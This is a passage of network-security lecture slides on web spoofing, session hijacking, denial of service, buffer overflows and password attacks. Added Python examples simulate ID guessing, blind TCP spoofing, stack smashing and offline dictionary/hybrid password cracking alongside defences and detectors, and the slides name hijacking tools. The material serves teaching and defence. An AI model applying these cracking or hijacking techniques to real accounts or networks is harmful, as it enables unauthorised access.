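The relay and spoofing filters described above, as an added example that is not part of the lecture: a minimal SMTP envelope handler that answers the HELO / MAIL FROM / RCPT TO / DATA sequence from slide 40 and refuses both open relaying and a remote client claiming a local sender. The local domain `example.edu`, the `client_is_internal` flag (standing in for "connection from the company network or authenticated"), the reply strings and the sample session are all assumptions for this demonstration.

```python
from typing import FrozenSet, List, Optional


def envelope_address(command: str) -> str:
    """Extract the address from "MAIL FROM:<a@b>" or "RCPT TO: a@b"."""
    _, _, rest = command.partition(":")
    return rest.strip().strip("<>").lower()


def domain_of(addr: str) -> str:
    return addr.rsplit("@", 1)[1] if "@" in addr else ""


class SmtpPolicy:
    """Envelope handler applying the slide's anti-relay and anti-spoof rules.

    local_domains: domains this server delivers mail for.
    client_is_internal: True when the connection comes from the company network
    (or has authenticated); only such clients may send to foreign domains.
    """

    def __init__(self, local_domains: FrozenSet[str], client_is_internal: bool):
        self.local_domains = frozenset(d.lower() for d in local_domains)
        self.client_is_internal = client_is_internal
        self.sender: Optional[str] = None
        self.recipients: List[str] = []

    def handle(self, line: str) -> str:
        cmd = line.strip()
        verb = cmd.upper()
        if verb.startswith(("HELO", "EHLO")):
            return "250 mail.example.edu"
        if verb.startswith("MAIL FROM:"):
            addr = envelope_address(cmd)
            # Spoof filter: a remote, unauthenticated client may not claim to be one of us.
            if not self.client_is_internal and domain_of(addr) in self.local_domains:
                return "550 5.7.1 Sender address rejected: local domain from external client"
            self.sender = addr
            self.recipients = []
            return "250 2.1.0 OK"
        if verb.startswith("RCPT TO:"):
            if self.sender is None:
                return "503 5.5.1 Need MAIL command first"
            addr = envelope_address(cmd)
            # Relay filter: deliver only to our own domains unless the client is internal.
            if domain_of(addr) in self.local_domains or self.client_is_internal:
                self.recipients.append(addr)
                return "250 2.1.5 OK"
            return "554 5.7.1 Relay access denied"
        if verb == "DATA":
            if not self.recipients:
                return "503 5.5.1 No valid recipients"
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 Bye"
        return "500 5.5.2 Command not recognized"


def run_session(lines: List[str], client_is_internal: bool,
                local_domains: FrozenSet[str] = frozenset({"example.edu"})) -> List[str]:
    """Feed a list of client commands through the policy and return the server replies."""
    policy = SmtpPolicy(local_domains, client_is_internal)
    return [policy.handle(line) for line in lines]


# Constructed session: an outside client connects to port 25 and tries first a
# spoofed local sender, then relaying to a third-party domain.
REMOTE_SESSION = [
    "HELO outside.example.org",
    "MAIL FROM:<sgoel@example.edu>",           # claims to be local: rejected
    "MAIL FROM:<someone@outside.example.org>",  # honest external sender: accepted
    "RCPT TO:<student@example.edu>",           # local recipient: accepted
    "RCPT TO:<victim@other.example.net>",      # foreign recipient from outside: relay denied
    "DATA",
]

if __name__ == "__main__":
    for cmd, reply in zip(REMOTE_SESSION, run_session(REMOTE_SESSION, client_is_internal=False)):
        print(f"C: {cmd}\nS: {reply}")
```

The same session run with `client_is_internal=True` is accepted end to end, which is exactly the distinction the slide draws: relaying is legitimate for your own users and an open door for everyone else.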
Slide 42
Web Spoofing
- Basic
- Man-in-the-Middle Attack
- URL Rewriting
- Tracking State
Slide 43
Web Spoofing - Basic
- There is no requirement against registering a domain; the attacker registers a web address matching an entity, e.g. votebush.com, geproducts.com, gesucks.com.
- Process:
  The hacker sets up a spoofed site.
  The user goes to the spoofed site, clicks on items to order and checks out.
  The site prompts the user for credit card information, gives the user a cookie and puts up the message "Site experiencing technical difficulty".
  When the user tries back, the spoofed site checks the cookie; it already has the credit card number, so it directs the user to the legitimate site.
Slide 44
Web Spoofing - Basic
Protection
- Use server-side certificates; certificates are much harder to spoof.
- Users need to ensure that the certificates are legitimate before clicking on OK to accept a certificate.
Slide 45
Web Spoofing: Man-in-the-Middle Attack
- The attacker acts as a proxy between the web server and the client.
- The attacker has to compromise the router or a node through which the relevant traffic flows.
- Protection: secure the perimeter to prevent compromise of routers.
Slide 46
Web Spoofing: URL Rewriting
- The attacker redirects web traffic to another site that is controlled by the attacker.
- The attacker writes his own web site address before the legitimate link, e.g. the user is first directed to the hacker site and then redirected to the actual site.
- Protections:
  Web browsers should be configured to always show the complete address.
  Ensure that the code for the web sites is properly protected at the server end and during transit.
Slide 47
Web Spoofing: Tracking State
- When a user logs on to a site, a persistent authentication is maintained.
- This authentication can be stolen for masquerading as the user.
Slide 48
Tracking State
- Browsers primarily use the HTTP protocol to communicate. HTTP is a stateless protocol.
- Web sites need to maintain persistent authentication so that the user does not have to authenticate repeatedly.
- This authentication can be stolen for masquerading as the user.
[Diagram: Browser sends Request to Web Server and receives Response; the Web Server talks to a Database.]
Slide 49
Web Spoofing: Tracking State
Three types of tracking methods are used:
1. Cookies: a line of text with an ID in the user's cookie file. An attacker can read the ID from the user's cookie file.
2. URL session tracking: an ID is appended to all the links in the website's web pages. An attacker can guess or read this ID and masquerade as the user.
3. Hidden form elements: the ID is hidden in form elements which are not visible to the user. A hacker can modify these to masquerade as another user.
Slide 50
Web Spoofing: Tracking State - Cookies
- Cookies are a piece of information that the server passes to the browser and the browser stores on the user's machine: a set of name/value pairs.
- Web servers place cookies with an ID on user machines to track the users.
- Two types of cookies:
  Persistent cookies: stored on the hard drive in text format.
  Non-persistent cookies: stored in memory; they go away after you reboot or turn off the machine.
- An attacker gets cookies by accessing the victim's hard drive, or by guessing the IDs which different web servers assign.
Slide 51
Web Spoofing: Tracking State - Cookies
Protection
- Physical protection of hard drives is the best protection.
- Use non-persistent cookies, since the hacker has to access and edit memory to get to them.
- Use random, hard-to-guess IDs.
Slide 52
Web Spoofing: Tracking State - URL Encoding
http://www.address.edu:1234/path/subdir/file.ext?query_string
- Service: http
- Host: www.address.edu
- Port: 1234
- /path/subdir/file.ext: resource path on the server
- query_string: additional information that can be passed to the resource
HTTP allows name/value pairs to be passed to the resource:
http://www.test.edu/index.jsp?firstname=sanjay&lastname=goel
- The server can place the ID of a customer along with the URL: http://www.fake.com/ordering/id=928932888329938.823948
- This number can be obtained by guessing or by looking over someone's shoulder.
- The timeout for the sessions may be a few hours.
- The user can masquerade as the owner of the ID and transact on the web.
Slide 53
Web Spoofing: URL Encoding - Protection
Server side:
- Use large, hard-to-guess identifiers.
- Keep the session inactivity timeout low.
User side:
- Make sure that no one is looking over your shoulder as you browse.
- Do not leave terminals unattended.
- Use server-side certificates: a server-side certificate is the certificate that the server presents to the client to prove its identity. Users should verify the certificate before clicking OK on the accept button.
Slide 54
Web Spoofing: Tracking State - Hidden Form Fields
- HTML allows hidden fields in forms; developers use them to carry state that the server needs back on the next request.
- The session ID can be stored as a hidden form field. Anything in a hidden field comes back from the client and may have been edited, so the server must treat it as untrusted input.
Protection:
- Hard-to-guess IDs.
- Short expiry times.
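The following is an added example, not code from the lecture, covering the tracking-state slides on cookies, URL encoding and hidden form fields together: a session store with random IDs and an inactivity timeout beside the sequential-ID anti-pattern, and the attacker's guessing step run against both. Whether the ID travels in a cookie, in the URL or in a hidden field, the server sees only the ID, so the ID is the whole authentication. The class names, the starting counter value and the 15-minute timeout are illustrative choices, not anything the slides specify.

```python
"""Added example, not from the lecture: a session store of the kind the
tracking-state slides describe, and the attacker's guessing step against it.
Class names, the sequential counter and the timeout value are illustrative."""
import secrets
import time

SESSION_ID_BYTES = 32       # 256 bits of entropy per ID
INACTIVITY_LIMIT = 15 * 60  # seconds; keep the inactivity window short


class SessionStore:
    """Random, hard-to-guess IDs with a sliding inactivity timeout."""

    def __init__(self, clock=time.time):
        self._clock = clock          # injectable so the timeout can be tested
        self._sessions = {}          # session_id -> (user, last_seen)

    def create(self, user):
        sid = secrets.token_urlsafe(SESSION_ID_BYTES)   # CSPRNG, not a counter
        self._sessions[sid] = (user, self._clock())
        return sid

    def lookup(self, sid):
        """Return the user behind a presented ID, or None if unknown/expired."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        user, last_seen = entry
        now = self._clock()
        if now - last_seen > INACTIVITY_LIMIT:
            del self._sessions[sid]  # a stolen but stale ID is worthless
            return None
        self._sessions[sid] = (user, now)
        return user


class WeakSessionStore(SessionStore):
    """The anti-pattern of the URL-encoding slide: a sequential number as ID."""

    def __init__(self, clock=time.time):
        super().__init__(clock)
        self._next = 928932888329938   # long, but predictable (constructed)

    def create(self, user):
        sid = str(self._next)
        self._next += 1
        self._sessions[sid] = (user, self._clock())
        return sid


def guess_neighbours(observed_sid, store, spread=50):
    """Attacker model: having seen one ID (his own session, a shoulder-surfed
    URL), try the nearby integers. Returns the users whose sessions hit."""
    try:
        base = int(observed_sid)
    except ValueError:
        return []        # a random token gives nothing to count from
    hits = []
    for candidate in range(base - spread, base + spread + 1):
        sid = str(candidate)
        if sid == observed_sid:
            continue
        user = store.lookup(sid)
        if user is not None:
            hits.append(user)
    return hits


if __name__ == "__main__":
    weak = WeakSessionStore()
    weak.create("alice")
    print(guess_neighbours(weak.create("mallory"), weak))      # ['alice']
    strong = SessionStore()
    strong.create("alice")
    print(guess_neighbours(strong.create("mallory"), strong))  # []
```

Against the weak store, Mallory needs only her own ID and a loop of a hundred requests to find Alice's session; against the random store the same loop finds nothing, and once Alice has been idle past the limit even a copied ID is rejected.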
Slide 55
Web Spoofing: General Protection
- Disable JavaScript, ActiveX and other scripting languages that execute locally or in the browser.
- Make sure that the browser's location line (address bar) is always visible.
- Educate the users.
- Use hard-to-guess session IDs.
- Use server-side certificates: a server-side certificate is the certificate that the server presents to the client to prove its identity. Users should verify the certificate before clicking OK on the accept button.
Slide 56
Session Hijacking
Definition: the process of taking over an existing active session.
Modus operandi:
1. The user connects to the server and authenticates with his user ID and password.
2. Once authenticated, the user has access to the server for as long as the session lasts.
3. The hacker takes the user offline with a denial of service attack.
4. The hacker gains access to the server by impersonating the user, inheriting the already authenticated session.
Slide 57
Session Hijacking
Once in control of the session, the attacker can:
- monitor the session,
- periodically inject commands into the session,
- launch passive and active attacks from the session.
[Diagram: Bob telnets to Server; Bob authenticates to Server; the Attacker sends "Die!" to Bob, knocking him offline, and "Hi! I am Bob" to the Server.]
Slide 58
Session Hijacking: How Does it Work?
- Attackers exploit TCP sequence numbers to hijack sessions.
- Sequence numbers are 32-bit counters (of bytes, not packets) used to:
  tell the receiving machine the correct order of the data it receives,
  tell the sender which data has been received and which has been lost.
- Receiver and sender each have their own sequence number.
- For two parties to communicate, the following must match: IP addresses, port numbers, sequence numbers.
- IP addresses and port numbers are easily available (visible on the wire, or guessable), so once the attacker can supply sequence numbers that the server accepts, he can inject his own segments and hijack the session.
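The following is an added example, not code from the lecture, modelling the point made above: the attacker can learn addresses and ports, but to speak for the victim he must present sequence numbers the server accepts. It shows the receive-window test a TCP endpoint applies, and a blind spoofed handshake (the victim silenced, as in steps 3 and 4 of the session hijacking slide) that succeeds when initial sequence numbers grow by a fixed step per clock tick and fails when they are random. Only the window test follows RFC 793; the Server class, the tick-based generator, its step of 64000, and the addresses are constructed for the example.

```python
"""Added example, not from the lecture: a model of why the session hijacker
needs an acceptable sequence number, and why predictable initial sequence
numbers (ISNs) hand it to him. Server, ISN step and addresses are illustrative."""
import secrets

MOD = 1 << 32                   # sequence numbers are 32-bit and wrap


def in_window(seq, rcv_nxt, rcv_wnd):
    """RFC 793 acceptability test: is byte `seq` inside the receive window?
    Modular subtraction handles wrap-around of the 32-bit counter."""
    return (seq - rcv_nxt) % MOD < rcv_wnd


def isn_predictable(tick):
    """ISN that grows by a fixed step per clock tick, as early TCP stacks
    did; two observations reveal the step, so the next ISN can be computed.
    The step of 64000 is a constructed value."""
    return (tick * 64000) % MOD


def isn_random(tick):
    """Modern behaviour: a fresh unpredictable ISN for every connection."""
    return secrets.randbelow(MOD)


class Server:
    """Only the handshake state matters here: pending SYNs and who got in."""

    def __init__(self, isn_fn):
        self._isn_fn = isn_fn
        self._pending = {}       # client address -> our ISN for that SYN
        self.established = set()

    def syn(self, client, tick):
        isn = self._isn_fn(tick)
        self._pending[client] = isn
        return isn               # carried in the SYN-ACK sent to `client`

    def ack(self, client, ack_num):
        """Third handshake packet: accepted only if it acknowledges ISN + 1."""
        isn = self._pending.pop(client, None)
        if isn is not None and ack_num == (isn + 1) % MOD:
            self.established.add(client)
            return True
        return False


def predict_isn(isn_a, tick_a, isn_b, tick_b, target_tick):
    """Attacker: extrapolate from two ISNs observed on his own connections."""
    step = ((isn_b - isn_a) % MOD) // max(tick_b - tick_a, 1)
    return (isn_b + step * (target_tick - tick_b)) % MOD


def blind_spoof(server, victim, attack_tick):
    """The victim has been knocked offline, so the SYN-ACK sent to the
    victim's address is seen by nobody; the attacker must guess the ISN
    it carried to complete the handshake in the victim's name."""
    attacker = ("10.0.0.66", 40000)
    isn_a = server.syn(attacker, attack_tick - 2)               # probes: the
    isn_b = server.syn((attacker[0], 40001), attack_tick - 1)   # attacker sees
    guess = predict_isn(isn_a, attack_tick - 2,                 # these replies
                        isn_b, attack_tick - 1, attack_tick)
    server.syn(victim, attack_tick)        # spoofed SYN; reply goes to victim
    return server.ack(victim, (guess + 1) % MOD)   # spoofed ACK with the guess


if __name__ == "__main__":
    victim = ("192.0.2.10", 1023)
    print(blind_spoof(Server(isn_predictable), victim, 100))   # True
    print(blind_spoof(Server(isn_random), victim, 100))        # False
```

With a sniffer on the path (what the tools on the next slides provide) the attacker reads the live sequence numbers instead of predicting them, and `in_window` is then the only hurdle his injected segment has to clear.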
Slide 59
Session Hijacking: Programs
- Juggernaut: network sniffer that can also be used for hijacking. Get it from http://packetstorm.securify.com
- Hunt: can be used to listen to, intercept and hijack active sessions on a network. http://lin.fsid.cvut.cz/~kra/index.html
- TTY Watcher: freeware program to monitor and hijack sessions on a single host. http://www.cerias.purdue.edu
- IP Watcher: commercial session hijacking tool based on TTY Watcher. http://www.engrade.com
Slide 60
Session Hijacking: Protection
- Use encryption: prevents the hacker from reading and forging the packets of the session.
- Use a secure protocol for sensitive work, e.g. administering remote machines (an encrypted protocol rather than telnet).
- Limit incoming connections.
- Minimize remote access.
- Strong authentication alone is ineffective, since authentication happens only at the beginning of the session; the hijacker steps in after it has succeeded.
Slide 61
Denial of Service (DoS) Attack
Definition: an attack through which a person renders a system unusable, or significantly slows it down for legitimate users, by overloading it so that no one else can use it.
Types:
1. Crashing the system or network: send the victim data or packets that cause the system to crash or reboot.
2. Exhausting resources by flooding the system or network with traffic: since all resources are consumed, others are denied access to them.
3. Distributed DoS (DDoS) attacks: coordinated denial of service attacks involving several people and/or machines launching the attack at once.
Slide 62
Denial of Service (DoS) Attack
Types:
1. Ping of Death
2. SSPing
3. Land
4. Smurf
5. SYN Flood
6. CPU Hog
7. WinNuke
8. RPC Locator
9. Jolt2
10. Bubonic
11. Microsoft Incomplete TCP/IP Packet Vulnerability
12. HP OpenView Node Manager SNMP DoS Vulnerability
13. NetScreen Firewall DoS Vulnerability
14. Checkpoint Firewall DoS Vulnerability
Slide 63
DoS Attack - Protection
- Effective, robust design: create redundant servers; distribute your servers across different ISPs.
- Bandwidth limitations: limit the available bandwidth per protocol.
- Keep systems patched: prevents the attacks that crash machines.
- Run the least number of services: limits the hacker's options.
- Allow only necessary traffic: prevents hacked machines from being used as launching pads.
- Block IP addresses: once under attack, start blocking the attacking addresses at the firewall.
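The following is an added example, not code from the lecture, showing how three of the attack types listed on the previous slide (Land, Ping of Death, SYN flood) can be recognised in traffic, which is the first step before the firewall blocking recommended above. The checks follow the attacks' definitions; the packet record format, the addresses, the window and the threshold are constructed for the example, and the trace it runs over is constructed as well.

```python
"""Added example, not from the lecture: detection checks for Land, Ping of
Death and SYN flood, run over a constructed packet trace. Record format,
addresses and thresholds are illustrative."""
from collections import defaultdict

MAX_IP_DATAGRAM = 65535    # an IP datagram cannot legally exceed this
SYN_WINDOW = 10            # seconds per counting bucket (constructed)
SYN_THRESHOLD = 100        # bare SYNs from one source per window (constructed)


def is_land(p):
    """Land: a spoofed TCP packet whose source and destination endpoint are
    identical, making the victim talk to itself."""
    return (p["proto"] == "tcp" and p["src"] == p["dst"]
            and p["sport"] == p["dport"])


def is_ping_of_death(p):
    """Ping of Death: an ICMP fragment that would reassemble past 65535
    bytes. frag_offset is in 8-byte units, as in the IP header."""
    return (p["proto"] == "icmp"
            and p["frag_offset"] * 8 + p["len"] > MAX_IP_DATAGRAM)


def syn_flood_sources(packets):
    """SYN flood: sources sending more bare SYNs (SYN set, ACK clear) than
    SYN_THRESHOLD within one SYN_WINDOW-second bucket."""
    counts = defaultdict(int)        # (src, bucket) -> SYN count
    for p in packets:
        if p["proto"] == "tcp" and "S" in p["flags"] and "A" not in p["flags"]:
            counts[(p["src"], int(p["ts"] // SYN_WINDOW))] += 1
    return sorted({src for (src, _), n in counts.items() if n > SYN_THRESHOLD})


def analyze(packets):
    return {
        "land": [p for p in packets if is_land(p)],
        "ping_of_death": [p for p in packets if is_ping_of_death(p)],
        "syn_flood": syn_flood_sources(packets),
    }


def tcp(ts, src, sport, dst, dport, flags):
    return {"proto": "tcp", "ts": ts, "src": src, "sport": sport,
            "dst": dst, "dport": dport, "flags": flags}


def icmp(ts, src, dst, frag_offset, length):
    return {"proto": "icmp", "ts": ts, "src": src, "dst": dst,
            "frag_offset": frag_offset, "len": length}


# Constructed trace: one normal handshake, one Land packet, one oversized
# fragment, and 150 half-open SYNs from a single source within five seconds.
SERVER = "203.0.113.5"
TRACE = (
    [tcp(0.0, "198.51.100.7", 51000, SERVER, 80, "S"),
     tcp(0.1, SERVER, 80, "198.51.100.7", 51000, "SA"),
     tcp(0.2, "198.51.100.7", 51000, SERVER, 80, "A"),
     tcp(1.0, SERVER, 139, SERVER, 139, "S"),           # Land
     icmp(2.0, "198.51.100.9", SERVER, 8180, 1480)]     # 65440 + 1480 > 65535
    + [tcp(3.0 + i * 0.03, "10.0.0.9", 40000 + i, SERVER, 80, "S")
       for i in range(150)]                             # SYN flood
)


if __name__ == "__main__":
    report = analyze(TRACE)
    print(len(report["land"]), len(report["ping_of_death"]), report["syn_flood"])
```

The first two checks are per packet and can sit in a filter; the SYN-flood check needs state across packets, and a real flood usually comes from spoofed or many sources, so per-source counting is only a starting point and the bandwidth and redundancy measures above remain necessary.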
Slide 64
Buffer Overflow Attacks: How does it work?
- This attack takes advantage of the way in which programs store information on the stack.
- The attacker tries to store more information on the stack than the size of the buffer.
[Diagram, normal stack, from top of memory to bottom: Function Call Arguments | Return Pointer | Local Variable 1 | Buffer 1 | Local Variable 2 | Buffer 2. Buffers fill upward, towards the return pointer.]
[Diagram, smashed stack: Buffer 1 and the space above it are overwritten; the Return Pointer now holds a New Pointer to Exec Code, which points at Machine Code: execve(/bin/sh) placed in the overflowed buffer.]
Slide 65
Buffer Overflow Attacks
- Programs that do not rigorously check the size of what they write into memory are vulnerable to this attack.
- Simple weaknesses can be exploited: if the memory allocated for a name is 50 characters, someone can break the program by sending a fictitious name of more than 50 characters.
- The attack can be used for espionage, denial of service or compromising the integrity of the data.
Examples:
- NetMeeting buffer overflow
- Outlook buffer overflow
- AOL Instant Messenger buffer overflow
- SQL Server 2000 extended stored procedure buffer overflow
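The following is an added example, not code from the lecture, and a simulation rather than native code: it models the stack frame of the diagram above as a byte array to show why a name longer than the 50-character buffer lets the sender choose where the function returns, and what the bounds-checked copy changes. The frame layout, both addresses and the slot sizes are constructed for illustration.

```python
"""Added example, not from the lecture: a bytearray model of a stack frame,
showing an unchecked copy overwriting the saved return pointer beside the
bounds-checked copy that does not. Layout and addresses are illustrative."""

BUF_SIZE = 50            # the 50-character name buffer
RET_SIZE = 8             # saved return pointer, 64-bit
RET_OFFSET = BUF_SIZE    # model: the return pointer sits right above the buffer

LEGIT_RETURN = 0x0000000000401136      # where the caller expects control back
SHELLCODE_ADDR = 0x00007FFC1234ABC0    # where the attacker placed execve("/bin/sh")


def new_frame():
    """Fresh frame: empty buffer followed by the saved return pointer."""
    frame = bytearray(BUF_SIZE + RET_SIZE)
    frame[RET_OFFSET:] = LEGIT_RETURN.to_bytes(RET_SIZE, "little")
    return frame


def copy_unchecked(frame, name):
    """Models strcpy(): copies every byte of `name` into the buffer with no
    length check. The frame is contiguous memory, so bytes past BUF_SIZE
    land in the return pointer slot (and beyond it, on a real stack)."""
    n = min(len(name), len(frame))     # the model stops at the frame's end
    frame[:n] = name[:n]
    return frame


def copy_checked(frame, name):
    """The fix: never write more than the buffer holds, keep a terminator."""
    n = min(len(name), BUF_SIZE - 1)
    frame[:n] = name[:n]
    frame[n] = 0
    return frame


def return_address(frame):
    """What the CPU will jump to when this function returns."""
    return int.from_bytes(frame[RET_OFFSET:RET_OFFSET + RET_SIZE], "little")


def malicious_name():
    """The fictitious over-long name: padding to fill the buffer, then the
    new pointer that lands exactly on the return address slot."""
    return b"A" * BUF_SIZE + SHELLCODE_ADDR.to_bytes(RET_SIZE, "little")


if __name__ == "__main__":
    print(hex(return_address(copy_unchecked(new_frame(), b"sanjay"))))
    print(hex(return_address(copy_unchecked(new_frame(), malicious_name()))))
    print(hex(return_address(copy_checked(new_frame(), malicious_name()))))
```

The attacker only needs two things the model makes visible: the distance from the buffer start to the return pointer, and an address to put there; the checked copy removes the first by refusing to write past the buffer.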
Slide 66
Buffer Overflow Attacks - Prevention
- Close the port or service: remove vulnerable software; remove software that is no longer being used.
- Apply vendor patches: update as soon as the vendor releases them.
- Filter specific traffic at the firewall: once the vulnerable application is identified, stop all requests to it.
- Test key applications: test software for vulnerabilities.
- Run software with the least privilege required: limits what the hacker can do with a successful exploit.
Slide 67
Password Attacks
A hacker can easily exploit weak passwords and uncontrolled network modems.
Steps:
- The hacker gets the phone number of a company.
- The hacker runs a war dialer program: if the published number is 555-5532, he dials every number in the 555-55xx range.
- When a modem answers, he records that phone number.
- The hacker now needs a user ID and password to enter the company network.
- Companies often have default accounts, e.g. temp or anonymous, with no password.
- Often the root account uses the company name as the password.
- For strong passwords, password cracking techniques exist.
Slide 68
Password Security
- The password is not stored in the clear: a salt is added to randomize it, the salted password is hashed, and only the salt and the hash are stored on the system.
- On login the client sends its password; the server hashes it with the stored salt, compares the result with the stored hash, and allows or denies access.
- Password attacks are launched to recover the password from the stored hash.
[Diagram: Client -> Password -> Server; on the Server: Password + Salt -> Hash Function -> Hashed Password; Compare with Stored Password (hashed) -> Allow/Deny Access.]
Slide 69
Password Attacks - Process
- Find a valid user ID.
- Create a list of possible passwords.
- Rank the passwords from high probability to low.
- Type in each password.
- If the system lets you in, success!
- If not, try again, being careful not to exceed the password lockout (the number of wrong guesses allowed before the system shuts the account and will not let you try any more).
Slide 70
Password Attacks - Types
- Dictionary attack: the hacker tries every word in a dictionary; 70% of people use dictionary words as passwords.
- Brute force attack: try every combination of the letters and symbols in the alphabet.
- Hybrid attack: dictionary words and their variations (capitalisation, appended digits, substituted characters) are used in the attack.
- Social engineering: people write passwords down in various places, and disclose them naively to others.
- Shoulder surfing: hackers slyly watch over people's shoulders to steal passwords.
- Dumpster diving: people throw papers in the garbage that may contain information useful for cracking passwords.
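The following is an added example, not code from the lecture, tying the three password slides together: the salted-hash store and compare step, the online guessing loop that runs into the lockout, and a dictionary plus hybrid guess list run offline against the stored hash, where no lockout applies. The wordlist, the account, the iteration count and the lockout threshold are constructed for the example, and PBKDF2 stands in for whatever hash a given system uses.

```python
"""Added example, not from the lecture: salted password hashing, an online
guess loop stopped by lockout, and an offline dictionary/hybrid attack on
the stored hash. Wordlist, account, iterations and lockout are constructed."""
import hashlib
import hmac
import os

ITERATIONS = 10_000     # kept low so the example runs quickly; use far more
LOCKOUT = 5             # wrong guesses before the account is shut


def hash_password(password, salt=None):
    """Salt plus slow hash; returns (salt, digest) for storage."""
    if salt is None:
        salt = os.urandom(16)            # per-user random salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify(stored, password):
    """The server's compare step: rehash with the stored salt and compare."""
    salt, digest = stored
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, digest)   # constant-time compare


class Account:
    def __init__(self, username, password):
        self.username = username
        self.stored = hash_password(password)
        self.failures = 0
        self.locked = False

    def login(self, password):
        if self.locked:
            return False
        if verify(self.stored, password):
            self.failures = 0
            return True
        self.failures += 1
        if self.failures >= LOCKOUT:
            self.locked = True
        return False


WORDLIST = ["password", "welcome", "albany", "letmein", "summer"]  # constructed


def hybrid_candidates(words):
    """Dictionary words first, then the variations a hybrid attack adds:
    capitalised, upper-cased, a digit appended, common letter substitutions."""
    for w in words:
        yield w
        yield w.capitalize()
        yield w.upper()
        for base in (w, w.capitalize()):
            for d in range(10):
                yield f"{base}{d}"
        yield w.replace("a", "@").replace("e", "3").replace("o", "0")


def offline_crack(stored, words):
    """Offline: the attacker holds the salt and hash, so no lockout applies;
    only the hash cost limits him. Returns (password, guesses) or (None, n)."""
    n = 0
    for candidate in hybrid_candidates(words):
        n += 1
        if verify(stored, candidate):
            return candidate, n
    return None, n


def online_guess(account, words):
    """Online: every guess is a login attempt, so the lockout cuts it short."""
    for candidate in hybrid_candidates(words):
        if account.login(candidate):
            return candidate
        if account.locked:
            return None
    return None


if __name__ == "__main__":
    acct = Account("bob", "Albany7")
    print(online_guess(acct, WORDLIST), acct.locked)   # None True
    print(offline_crack(acct.stored, WORDLIST))        # ('Albany7', 69)
```

The contrast is the point of the two process slides: the lockout stops the online attacker after five attempts, but once the hash file has been copied the same guess list recovers "Albany7" on the 69th hash, and the only defences left are the salt (no precomputed tables), the iteration count (each guess costs real time) and a password that is not a dictionary word with a digit stuck on.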
Slide 71
Conclusions
- Computer security is a continuous battle: as computer security gets tighter, hackers get smarter.
- The stakes are very high: billions of dollars worth of business is conducted on the internet.